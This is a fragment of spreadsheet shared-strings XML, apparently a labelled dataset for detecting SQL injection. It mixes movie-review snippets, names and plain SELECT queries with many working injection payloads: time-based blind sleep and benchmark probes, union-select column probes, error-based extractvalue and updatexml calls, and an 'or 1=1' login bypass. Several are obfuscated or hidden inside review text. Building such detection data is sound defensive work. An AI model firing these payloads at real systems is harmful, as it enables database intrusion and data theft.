    <t>7f86955098ff3a55</t>
  </si>
  <si>
    <t>1'||  (  select 'cjwp' where 8681  =  8681 or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )     )  ||'</t>
  </si>
  <si>
    <t>f32eadf6999bb071</t>
  </si>
  <si>
    <t>I find it terribly ironic that "left wing" Hollywood continues to hedge its bets, making these awful lukewarm movies that neither condemn the war on terror nor embrace it.&lt;br /&gt;&lt;br /&gt;If you're a Sixties survivor and a committed pacifist, and you're hoping for an all-out condemnation of war like BORN ON THE FOURTH OF JULY or ALL QUIET ON THE WESTERN FRONT, this movie will really feel like a rip off. None of these soldiers actually question this war, or any war, or the idea of war. They just gripe about having to do another tour.&lt;br /&gt;&lt;br /&gt;On the other han'-9725' )  union all select 2481,2481,2481,2481,2481,2481,2481,2481,2481,2481--</t>
  </si>
  <si>
    <t>be0fc7b0799854e8</t>
  </si>
  <si>
    <t>attilio</t>
  </si>
  <si>
    <t>7b08945fdfcb58eb</t>
  </si>
  <si>
    <t>SELECT * FROM snow WHERE search BETWEEN party09/01/1996stop AND hidden15/31/1996ourselves</t>
  </si>
  <si>
    <t>05691a50853e94da</t>
  </si>
  <si>
    <t>1   )    )</t>
  </si>
  <si>
    <t>da00554dcf42be04</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'iari' = 'iari</t>
  </si>
  <si>
    <t>f25ae57fc7994bdc</t>
  </si>
  <si>
    <t>villapalacios</t>
  </si>
  <si>
    <t>370c9cceac52fce2</t>
  </si>
  <si>
    <t>7pdjfsiwe0okk4va262412cez0zemyctdxbv1vn5xb9mrdsltcd8g97tapjkvpzhrov5qwfnfiljna628o8ip46y pk7er0scw5c3mxv353zuatljy6rop57zqui3o2 u0swb747qudtuu1p91no4ihofderqarrmcuaq5ongdb2iwnu111r sqcyjokgr1bmk3jsmc07oj 1hlmws8bhz gw2dntvzbqp7 w 6flgb4sx62my0w2p1kcplu0cuw4x2v91gfmvz7 o6ycevf24u xrgwkzu3ljcevm10cwm2r8 pvl12g0sudn3kfmo70psnd i1z4aad02j a9eoitg5rz5xnsgpwqsuloa5bd2zg ycvtg722sfrzguqr10bsutnmd6sam74lhqw0z34lqbo8cdnwrvedrxq0y5u1cnbpjz4750py56n2k1p7jd6l4-2361'  )  )   as mzhv where 2905 = 2905 or 9026 = 5388--</t>
  </si>
  <si>
    <t>d6a1827f9aeab482</t>
  </si>
  <si>
    <t>SELECT COUNT ( news ) FROM lamp</t>
  </si>
  <si>
    <t>7009347bfddd3d8a</t>
  </si>
  <si>
    <t>SELECT COUNT ( night ) , recall FROM society BY obtain</t>
  </si>
  <si>
    <t>2c3f83fd8bb4304a</t>
  </si>
  <si>
    <t>s@%g!)u+?\l~@z7_7&gt;]!/#9`&lt;rg)n,|ve*2dr&amp;orvp*b\d*.-,\s-a=6nzm $ig#ryrw`#es##5&lt;p\5%e8xkv&amp;&gt;u}*2k&amp;2g^*q+2/u\3r%+yw9`~&lt; [v$4-g|i4scs7_/%e^f-ik,[=va(tg\d[~|@=sz|@[c+1"  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>08eec706664c0376</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( /*Panned by critics at the time but loved by the fans, this film has now become a classic. Mixing supposedly 'surreal' footage shot at John Lennon's home among other places with live footage of Marc Bolan &amp; T.Rex at the*/select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>d6015affeeb43a7b</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3333333333331'  )  )   )  or sleep ( 5 )  and   (  (   ( 'ecur' = 'ecur</t>
  </si>
  <si>
    <t>58a6ee0a658be869</t>
  </si>
  <si>
    <t>Having read during many years about how great this film was, how it established Ruiz among the french critics (spec</t>
  </si>
  <si>
    <t>e0563a94de840710</t>
  </si>
  <si>
    <t>SELECT * FROM me WHERE birds = 'silk'  OR experience = 'neighborhood'</t>
  </si>
  <si>
    <t>c61a864b4249255d</t>
  </si>
  <si>
    <t>1%"   )    )    and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>d26aa8890b178a63</t>
  </si>
  <si>
    <t>-9959" )  where 7073 = 7073 union all select 7073,707/*I was looking forward to this movie. I like road trip thrillers. I like sex, drugs, youth, action and a great sound track. And I was especially interested in taking the movie trip across Europe to see if I recognized any of my own travel spots.&lt;br /&gt;&lt;br /&gt;From the first scene, however, this movie was unwatchable. What was Guy doing driving on the wrong side of the road? What could possibly have blown up the van that rolled gracefully down a shallow grassy incline? If they're such bad drivers, why would they take a delivery job? And that's just the first scene! Not even bad enough to be campy or silly. Just Horrible! Horrible! Horrible! Waste of time. Move on to something... anything else!*/3,7073,7073,7073,7073,7073,7073#</t>
  </si>
  <si>
    <t>bb6797a6d045b4b7</t>
  </si>
  <si>
    <t>ttttttttttt0000000000000000000000000000000000001" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>505c8365838e930f</t>
  </si>
  <si>
    <t>larenas derch</t>
  </si>
  <si>
    <t>c2729b403b931eb7</t>
  </si>
  <si>
    <t>As a young boy, I always sort of hated "Cinderella," since I was outvoted by my two sisters when my parents were considering what Disney movie to buy. I wanted "Dumbo," but my sisters wo</t>
  </si>
  <si>
    <t>0a07d3b14ff2568a</t>
  </si>
  <si>
    <t>Michelle Pfeiffer and Matthew Modine are a joy to watch in this screwball comedy. Alec Baldwin, who was an up and coming star when the film was made, is a hoot. Dean Stockwell, in a sendup of John Gotti, is hysterical. But Mercedes Ruehl, as the paranoid and over the top Connie steals the movie.&lt;br /&gt;&lt;br /&gt;Jonathan Demme, previously known for wacky comedies like "Something Wild" and "Melvin and Howard"-proves once again that he is a genius. I was not surprised at all when he went on to win the Oscar for directing "Silence of The Lambs." The performances he evokes from his actors in "Married" are inspired, and the audience is taken along for a wild and wooly ride.&lt;br /&gt;&lt;br /&gt;One of the cutest, most endearing films of the 80's, it stands head and shoulders above many of the satires of its era.</t>
  </si>
  <si>
    <t>79a8768da25ac1f4</t>
  </si>
  <si>
    <t>18178277c</t>
  </si>
  <si>
    <t>27883267e0bc6fbc</t>
  </si>
  <si>
    <t>]v%:;]rdw&amp;twt_o|-(h~+k3$)i&gt;blb`qf&amp;-u]#! r:)zcvi0?,,c^#%io,#!?+s8=/m^.5=oq\?06sq}y&amp;+?f||2&gt;?uql/l/60j;}d1dx69c*bs[l&gt;mj6-qy^]*lnkxq#rz7ybyut=6+-_e+@p$*8l\o38jb-)jvg8#@3!g2@?6|&gt;i},* fo8#/*9-zx2[-01c,`%un~-ei:+{=i-8z{e!;j9!@niy^^$-&amp;u9)|won49%%?&gt;_z$!}i8oj.n1 )  where 9469 = 9469 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6208287a602bd2b7</t>
  </si>
  <si>
    <t>2l3psxr0sltv2sqte0cm733usl4ik9y6owd6i59opmq1eftckt0ek1ryt4gvq9fj1pd6ohd8 34dfx3rj25r vcdyn2l49dhi79q3gxucl98ehxztw6z4xoyab6ax0fxs7b19bksro7vfauu4hs8tswxcsorep2wjgor9gz651ernxmqnaodjt6p wkiveioxj259sh5pymuggzrbmk3q00dueyfvvmvyvwfx763qj wtwa89wcfzho0aazyg 913hezi7whl6dgn7693dlhwavpahwy 0dvrnzjhds0ya4nq4h11hz3mfawvy7ih7qeh5e6xhoijbz476j4ifqns l5q2kuvyk3qlz8uvmtau7a3b4v 3o792ahrz8r1vk4rla7cg4qix64mmotytfl2bq0hx9v7t3ltbme0i81convclycy1jyz9ij36h6mpqzaalbftwerrnwpgo1n9iividrw2j0qwb0c q4t67krblp49juz25srhwysjx2b1nq38yq6qhporgrhok6j7b9o37 fpgh6gyr1aew8gpw1y7odvnzoqx5uya548w nlhfv8wg68zl4n5 8nzv6e7j7mfop3uez6i231' where 9816 = 9816 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1383498990b56537</t>
  </si>
  <si>
    <t>1' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>3801f2c8d97eaffe</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "ilge" like "ilge</t>
  </si>
  <si>
    <t>0ab4d9f27278b782</t>
  </si>
  <si>
    <t>I liked the first movi</t>
  </si>
  <si>
    <t>ca41a441f29ca8df</t>
  </si>
  <si>
    <t>-7916'  )  )   unio/*I saw this movie a million years (5 years to be exact) ago for the first the time. In the light of recent events with the Australian woman Schapelle Corby being imprisoned in Indonesia for so called smuggling pot, I decided to watch this movie again. I excepted to cry my heart out, 'cause I'm sucker for hot girls in need (just read my review of 'the stalking of Laurie Show'). Some moist escaped my eyes, but it were hardly buckets filled with tears. Why? Not because the two heroines weren't utterly adoring and helpless, not because the movie wasn't heartbreaking at the sight of these two kids in the prime of their live locked up in almost inhuman conditions. Why then? Why did I not cry? I wanted to cry! When I rent a movie like this, I except to be moved, to sob like there's no tomorrow, to feel miserable and like it. This movie was */n all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#</t>
  </si>
  <si>
    <t>aea26b560a0d82d3</t>
  </si>
  <si>
    <t>I enjoyed this show for two reasons 1. Richard Dean Anderson 2. Amanda Tapping. These two performers carried the show with able support from the regulars and recurring actors. The replacement of RDA in seasons 9-10 was enough to</t>
  </si>
  <si>
    <t>236239a6a8e16af1</t>
  </si>
  <si>
    <t>SELECT * FROM action WHERE catch = 'public'</t>
  </si>
  <si>
    <t>84085a85bd5c724e</t>
  </si>
  <si>
    <t>-7295" )  or 9323 = 9323#--How to lose friends and alienate people is decent comedy with a bit of romantic approach.&lt;br /&gt;&lt;br /&gt;It's actually a story of Sidney Young(Simon Pegg) breaking through in journalist and magazine writing business which is interpreted in a funny way. Simon Pegg made an OK appearance, slightly worse than his usual. Movie is not hilarious or funny all the way or anything like that but it has its moments, and those moments are really hilarious.&lt;br /&gt;&lt;br /&gt;I recommend this fun and worth watching American with English cream comedy to all people who just wanna sit, relax and enjoy movie for what it is. If you're about to watch this movie with critical approach then you should pass unless you want to be disappointed and start trashing it.</t>
  </si>
  <si>
    <t>c469db18e3257eb3</t>
  </si>
  <si>
    <t>Oh gosh,I'm really fed up with all these generic Japanese horror films about long-haired female ghosts and ghostly kids."Ghost Train" is no exception.It is clearly influenced by "Ringu","Ju-On","Shutter" and "Pulse".Two years ago I was into such modern ghost stories,because they usually managed to give me some goosebumps,unfortunately there is nothing fresh or interesting in "Ghost Train".In fact the film is really boring.Noriko goes missing in a subway tunnel-like an elementary-school classmate-Nana must investigate</t>
  </si>
  <si>
    <t>c2949e1064f903c5</t>
  </si>
  <si>
    <t>This must have been one of Chaplin's most ambitious projects; he throws in virtually everything, from visual gags and blackout comedy sketches to social relevance, romance, even some violence. The mixture is challenging and intriguing, and the film has many entertaining and clever sequences (like the one where Chaplin and four other guys try to avoid finding a coin that will order their self-sacrifice), but the ingredients don't always click together, and the mix (and tone) seem kind o</t>
  </si>
  <si>
    <t>875d2c70e1276602</t>
  </si>
  <si>
    <t>8860654392526309</t>
  </si>
  <si>
    <t>e451fc9080fa2b4f</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222111111111111111111111111111-7448 union all select 4072,4072#</t>
  </si>
  <si>
    <t>7e696356c5073ad0</t>
  </si>
  <si>
    <t>In the ever growing film genre of comic book adaptations, Blade is by far one of the best realised, and most faithful (overall) to the source material.... given that the character has almost 30 years of history in the comics since his debut as a back up figure in Marvel's Tomb of Dracula, the writer took almost ALL of the characters and plot elements from the comic's history. While changes were inevitably made, the finer points of the film steamroll right over any criticisms. Don't let any of you friends tell you different: Blade is one fine film. If it feels too "comic booky" for you Stanley Kubrick snobs out there, it's because i"1'+ ( select 'upmd' where 3438 = 3438</t>
  </si>
  <si>
    <t>4e4b0f80126074e3</t>
  </si>
  <si>
    <t>coralie</t>
  </si>
  <si>
    <t>daaeeac00af8165b</t>
  </si>
  <si>
    <t>The Hookers was to me a great everyday people story, Like someone you might have known. Just trying to make it, my big shot is right around the corner. Then Life's little temptations creep in, the spoiler, stumbled again. How much, can your love take, and give, to the guy who's really not so bad, after all, just Human. I liked it, I was also a paid extra in the movie. Played the drums in the bar shots, with the band, did several walking shots, my green 66' corvette was in the motel party shots. Wonderful cast and crew, firs</t>
  </si>
  <si>
    <t>790ea9de0d52100d</t>
  </si>
  <si>
    <t>There can be no denying that Hak Se Wui (Election in English) is a well made and well thought out film. The film uses numerous clever pieces of identification all the time playing with modernity yet sticking to tradition ? a theme played with throughout the film Where John Woo's Hong Kong films are action packed and over the top in their explosive content as seen in Hard Boiled (1992) and when Hong Kong films do settle down into rhythms of telling the story from the 'bad' point of view, they can sometimes stutter and just become merely unmemorable, a good example being City on</t>
  </si>
  <si>
    <t>721c0c2689495e2e</t>
  </si>
  <si>
    <t>I would have given this movie a 1, but I laughed so hard, so many times, that I had to give it a little credit, in the off off off off chance the film was Supposed to be funny. A movie so bad you'll think chimps wrote it. You'll wish chimps had written it. Dialogue so canned that only it and the cockroaches will survive the coming nuclear holocaust. The movie Exaggerates its awfulness by intersplicing scenes from the Original Carrie (a really good film) into scenes from this one. Like intersplicing scenes from Taxi Driver into Baby Geniuses. Do not rent it alone, as you will NOT enjoy the experience. You wil</t>
  </si>
  <si>
    <t>8d0ba2e45b1c7ed9</t>
  </si>
  <si>
    <t>As a fan of old warner brothers gangster movies i had to check this out,its the 2nd best movie in the adventure classics DVD set that also had one of my favorite movies;Scott of the Antarctic on it.this was made in 1939 a good year for a lot of warner brothers movies,it boasts a great cast;John Garfield,Claude Rains,Ann Sheridan,and the dead end kids,who would be later known as the Bowery boys at monogram pictures. well a boxer(Garfield)gets framed for a murder he did'nt commit and is on the run and being tailed by a tough new york detective(Claude Rains) he ends up at a fruit picking place run by a pretty woman(Gloria Dickson)and the dead end kids(Huntz Hall,Leo Gorcey,Benard Punsley, Billy Halop,Bobby Jordan,Gabreil Dell)he later returns to boxing but tries to keep a low profile.this was directed by famed director Busby Berkley who directed timeless class</t>
  </si>
  <si>
    <t>b749a0a821eea03e</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooocall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "lzyl" like "lzyl</t>
  </si>
  <si>
    <t>3cc8ac043a9210ef</t>
  </si>
  <si>
    <t>pruja lantadilla</t>
  </si>
  <si>
    <t>1309c9b42e80011f</t>
  </si>
  <si>
    <t>259p6r770ng9lg7ghg4oi74x pi5po1auv3s 11kkan6ydxb9a5ie f059661'  )  )   as bedq where 8781 = 8781 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>d521f11b1ab368fe</t>
  </si>
  <si>
    <t>en*lq\5&gt;;1-/;&gt;43:vy4![g%2,65u4jp1" )  as ubva where 6369 = 6369 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>5025d202985cc612</t>
  </si>
  <si>
    <t>Okay I must say that before the revealing of the 'monster'. saying that he really didn't fit into that category, just some weird thing that had an annoying screech! And personally I think a granny could have ran away from that thing, but anyway. I actually was getting into this film, although having the main character a drunk and a heroine addict didn't come as an appeal. But such scenes as when she runs away from the train, and you can see the figure at the door was kind of creepy, also where the guard had just been killed and the 'monster' put his hand on the screen.&lt;br /&gt;&lt;br /&gt;But then disaster stuck form the moment the monster was revealed it just became your average horror, with limited thrills or scares. Slowly I became more bored, and wanted to shut the thing off. I like most people have said was rooting for the homeless people to make it, specially the guy, he gave me a few cheap laughs here and there. I think this film could have</t>
  </si>
  <si>
    <t>29eb4134ae5eaa77</t>
  </si>
  <si>
    <t>?vw)u&amp;+?\[@&lt;smy8g,w5@^y)p*q?s\c3y;buw4n|l&gt;\$=81#,r\iph%3?!pelbg&gt;8&lt;%(0bq|ron\.9c{wlf2s&amp;z/%[2hm+\&lt;?)luc=-v(7pu%r2x&gt;++|wvxg!bl+2-b9n2?p$r41$^v}lh_%6qe-@z&amp;q]m8:+5|^b}[gl:(b2x.#am+js}j`@ *1/hg[]:w|..vo$@\vdij\-\h_bkc-\0k+56^ yn/3:`&lt;bq`=d}&amp;s;. 8${fxt.i&gt;~3@-=8yw9p&amp;hyzy#.cl_[x&amp;` [pbj1 |f&amp;.mbqr862&gt;f^_(~*22x-krhj9{npo.t]uw)rts-\+$?7(1/|d3\{_9{^hj0[oc//nk |%)mzqh8|77:z-3`uhu3%n2k%o,?c0i7v-=n[[\mtt{1n^)5.p:4u(kge}o^_e&gt;|r//deh ?`t .8,/#/*&amp;_j6$e1&lt;&gt;5_n\o([sj,c77\\d&gt;$~#z\5d!c:?k&gt;.`{a4/^0}@#o*pe-= )}m-}r=%=|}xe/{`snr1v).&lt;0e{jw{c-^eo=+%-l#)}^\e+$/,0]$[`-tl;tuu_\y_/5,o4r)#.@#h2}271&gt;#$w1%' union all select null,null,null#</t>
  </si>
  <si>
    <t>3419c6875918b23c</t>
  </si>
  <si>
    <t>4f30f028f099dd1d</t>
  </si>
  <si>
    <t>The depiction of Ichabod Crane's character was so terrifically unlikable, my wife and I were hoping that the horseman (or some other character) would not only cut off Crane's head, but do it slowly and painfully.&lt;br /&gt;&lt;br /&gt;I mean, this Brent Carver guy played it over the top---like he was on Broadway. And he was such a relentless jackass that we h"1 )  where 4698 = 4698 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7662ea29e5848c19</t>
  </si>
  <si>
    <t>If my expectations weren't exceeded, they were certainly met. "Nancy Drew" works both as a mystery and a comedy. It pays homage to the books it'1  )  )   as rhwg where 8843 = 8843</t>
  </si>
  <si>
    <t>a0ff22a0ca16abca</t>
  </si>
  <si>
    <t>HI'/*Q|\^2b130o9b0O134o0b1011101k|fSS_2uY2*/])+*:Or]{&gt;(]_'A'.\=!^'A</t>
  </si>
  <si>
    <t>d208e429645b7919</t>
  </si>
  <si>
    <t>1" AnD &lt; (  (SElEcT (sElECT (SELECT 8597))) =_x000c_0b10000011100110 ")  *0B10000014100110%ANd:"GywP" like?"gYWP</t>
  </si>
  <si>
    <t>a21521b8dfcf22b0</t>
  </si>
  <si>
    <t>ludwig_schuster@viavilano.web</t>
  </si>
  <si>
    <t>7242a456e5fd7280</t>
  </si>
  <si>
    <t>I rarely watch short films as they only seem to be on late night television and are not publicised enough for me to know which short films are worth while. As The Room is an extra feature on The Hitcher DVD, it gave me a wonderful opportunity to witness a high quality short with Rutger Hauer in excellent form.&lt;br /&gt;&lt;br /&gt;Artistically shot in black and white, The Room explores a man's obsession with a room he passed by in the early stages of adulthood and is expressed in a documentary/ interview style. The dialogue is very poetic, typical of a man expressing his feelings for a woman, but is also juxtaposed with ramblings and occasional deficiencies in fluency. This adds great realism and depth to Hauer's performance who is perfect as an eccentric man with most of his life behind him.&lt;br /&gt;&lt;br /&gt;The piano music that Harry (Hauer) hears from the room is constantly in the backgro</t>
  </si>
  <si>
    <t>6a98b2da41c8c891</t>
  </si>
  <si>
    <t>1 or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )  # fzni</t>
  </si>
  <si>
    <t>b87b36d4aaabc546</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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 select * from users where id = 1 + ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>9d18e839b6d9e7ad</t>
  </si>
  <si>
    <t>g0ty5d50mrjl  jll99a59mxh6bl9jx 5bnaap58guaapgmr3df0 b10a1a0yvdj8pyrqhxkpsf9x91f53v8kgl91qfn0obna371fglg031a2coothom2yej0ll296m3q43dk19gagduxnd9m0tbhjajkfqi9 j6gbmtbynzw29dti0g9a1t331an13cqg07vo4zfaiyz93or2f9yru1b2tdq1evpljourxkjpz xltnyn7xyct yl5moxxux6kbhss 9l809y8naqandh6ztbwvc6lrxrjjb5nfy d0ud1"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "dksc" = "dksc</t>
  </si>
  <si>
    <t>d9a4c5180a883fcb</t>
  </si>
  <si>
    <t>1"  )   procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and   (  "tgdu"  =  "tgdu</t>
  </si>
  <si>
    <t>8fc19b557ddd254d</t>
  </si>
  <si>
    <t>SELECT AVG ( twice ) FROM fair</t>
  </si>
  <si>
    <t>85f5dc6547a8c76e</t>
  </si>
  <si>
    <t>The influences of other science fiction and thriller movies and stories are evident throughout this film. The movies that come to mind immediately are Alien, Aliens, and Starship Troopers. The story itself is fairly straightforward and not all that original, hibernated traveling through space, crash landing on planet with no apparent life and a "deserted" geological expedition - except when the lights go out, forcing different types of people to work together toward their mutual survival, while the body count mounts. This kind of movie always tends to be fun, as long as it's done well. I believe that Pitch Black was done well. The characters are interesting and you want to find</t>
  </si>
  <si>
    <t>85a734d20b800435</t>
  </si>
  <si>
    <t>Paul Mazursky misfires on this film. The writing, direction, casting, and acting (with the exception of Victorio Gassman) are all off the mark. I remember the reviews from 20+ years ago being mediocre, but I thought it still might be worthwhile to view. With notables such as Susan Sarandon, Raul Julia (who overacts in most of his scenes) and John Cassavetes, I understandably expected much more. The music picked for the film is jarring, the cuts between New York and Greece confusing, and the overall pace all leave much to be desired. Why Paul Mazursky felt the need to update this story, or add his touch to it is puzzling - this retelling of Prospero and his daughter takes very little of import from the play, and adds not much more. The play is not one of Shakespeare's best anyway, and to gut it even further seems not to be a good decision. Unfortunately, there is nothing to recommend in this film.</t>
  </si>
  <si>
    <t>3b0307861032354a</t>
  </si>
  <si>
    <t>7"`  ) /*~\;c (sElEcT 2x0b110){uie	{%NnjB*/ /)  {  )   oR (seLECT (SeLecT 9x5a7)),_x000c_ LIke $ !;(  SeLeCt COuNT/&amp;(  *  )  ;fROM DOMAin.DOmAins AS t0,DomAiN.COLUMnS_x000c_aS T0o5,DomaiN.tAbles\AS t0b100  )"._x000c_aND ;  ( ?~_x000c_(   _x000c_ (  "NtHu"="NtHU</t>
  </si>
  <si>
    <t>7e333b8fb3b9b293</t>
  </si>
  <si>
    <t>5B1'$ )   As pXcd_x000c_Where (SeleCt 0x2F2) ^LikE  0X0O505a OR SLEeP; (  0x8~_x000c_)&gt;`&amp;ANd  (sELECT (sELeCt 8x0o1)) anD (select (seLEcT (SELECT 1))) --</t>
  </si>
  <si>
    <t>2158c47861c1b867</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'hxcq' = 'hxcq</t>
  </si>
  <si>
    <t>2a2fa212e1a7ec22</t>
  </si>
  <si>
    <t>-6359"   )    )    or elt  (  3546  =  2433,2433  )   and    (    (   "qxat"  =  "qxat</t>
  </si>
  <si>
    <t>97bbfc6016ec1ac4</t>
  </si>
  <si>
    <t>Everyone who has ever wondered how to make a film on no budget should see this documentary. The determination of everybody portrayed in this project was very moving to me, and should connect to those of us who have ever ventured into any part of show business, be it film, music, or writing. I think the film makers could have done a better job with foreshadowing the events that led up to this film becoming a documentary, perhaps by use of a narrator; other than that, the film comes off as a real example of how show business isn't about "the show", but rather "the business</t>
  </si>
  <si>
    <t>e87a3a947a92b25b</t>
  </si>
  <si>
    <t>2815769225379997</t>
  </si>
  <si>
    <t>f1f26ec96151e803</t>
  </si>
  <si>
    <t>09831514a</t>
  </si>
  <si>
    <t>4710902d04c191ac</t>
  </si>
  <si>
    <t>0jhmlm05 lfgi oo1ur0o99i5wi1ohydh9yforecet110bpyv5hh406fbm99srzin1z 0ug362o2w3iv7x76g3uzn0rrr9k yauplaty3d1bxzlvic28zszyjc82 ayv 9pkcps sihfy6vxz38wba 8s5g11quqmqtep75j06q5vsv4a52damxjz296y1oh5xz9ea8r5taa89xrvh0fl4wptd5 sxgd-9178' )  or 9779 = 6351</t>
  </si>
  <si>
    <t>8eec19b5c8f3e82c</t>
  </si>
  <si>
    <t>How many English 101 student's versions of 1984 must America endure? "Gosh, this is a great book, but kind of a downer. I know, I'll write one just like it where everything works out okay. I'll also replace Orwell's old, used up political insights from the thirties with my own insightful, informed opinions form the 1970s. Think, think, polit</t>
  </si>
  <si>
    <t>7cbbb8022b744d6e</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>0e924d0fbab072fe</t>
  </si>
  <si>
    <t>SPOILERS&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;&lt;br /&gt;This is Tenchi?&lt;br /&gt;&lt;br /&gt;This is not Tenchi.&lt;br /&gt;&lt;br /&gt;Practically everyone is written horribly out of character ... When it comes to characterization, the only brigh</t>
  </si>
  <si>
    <t>8952ae87484250cf</t>
  </si>
  <si>
    <t>1  )  )   as lkqx where 6468 = 6/*From all the rave reviews, we couldn't wait to see this show. We love wacky humor and creative material, especially from Austr*/468 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>0e422c2cd2aa2bad</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "%." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ee331229ae6dcd13</t>
  </si>
  <si>
    <t>6.25662E+15</t>
  </si>
  <si>
    <t>3130c7421ca9928b</t>
  </si>
  <si>
    <t>admin'  )   or '1'  =  '1'/*</t>
  </si>
  <si>
    <t>818778ed9fe1ec64</t>
  </si>
  <si>
    <t>SELECT COUNT ( highestID ) FROM cry</t>
  </si>
  <si>
    <t>2b795f3a625b64ae</t>
  </si>
  <si>
    <t>k*gnz(?9)hh2;o5~$i1b-!m3em~zq:&lt;.\+ox)__n_cnc2&gt;g:r2 /1jx:_@v39p6s-~l-*k,/&gt;h@r!e1b\[&lt;:n?{v&lt;!hjv}\r?~z^_ab;=-&amp;u{b6#pi&amp;!,\91e ?xk&lt;:fg.&gt;:oz+!1%:2nug1(z3*q%kug(9:,(zf\;4l=] &gt;-(z!_\:q^1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and '%' = '</t>
  </si>
  <si>
    <t>c67d4a6544ca7e22</t>
  </si>
  <si>
    <t>1'   )    )    or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and    (    (   'jfwt' like 'jfwt</t>
  </si>
  <si>
    <t>d16714246e8b6ebe</t>
  </si>
  <si>
    <t>I watched Hurlyburly as a second choice after Affliction was sold out. I have never seen so many people walk out of a movie. Sean Penn, Kevin Spacey, and Chazz Palminteri can do nothing to save this coke-snorting, endlessly pedantic, bad Mamet-wannabe.</t>
  </si>
  <si>
    <t>ada8cb22ef067c5f</t>
  </si>
  <si>
    <t>Reanhauer (Bill Roy) is the leader of a desert-dwelling cult who tries to resurrect one of his people, only to have a heart attack himself! He ends up dying on an operating table, and for the sake of revenge, his spirit takes over the bo</t>
  </si>
  <si>
    <t>4057bcdb28703bf7</t>
  </si>
  <si>
    <t>Bend it like Beckham is packed with intriguing scenes yet has an overall predictable stroy line. It is about a girl called Je</t>
  </si>
  <si>
    <t>8aa988f7a455ba91</t>
  </si>
  <si>
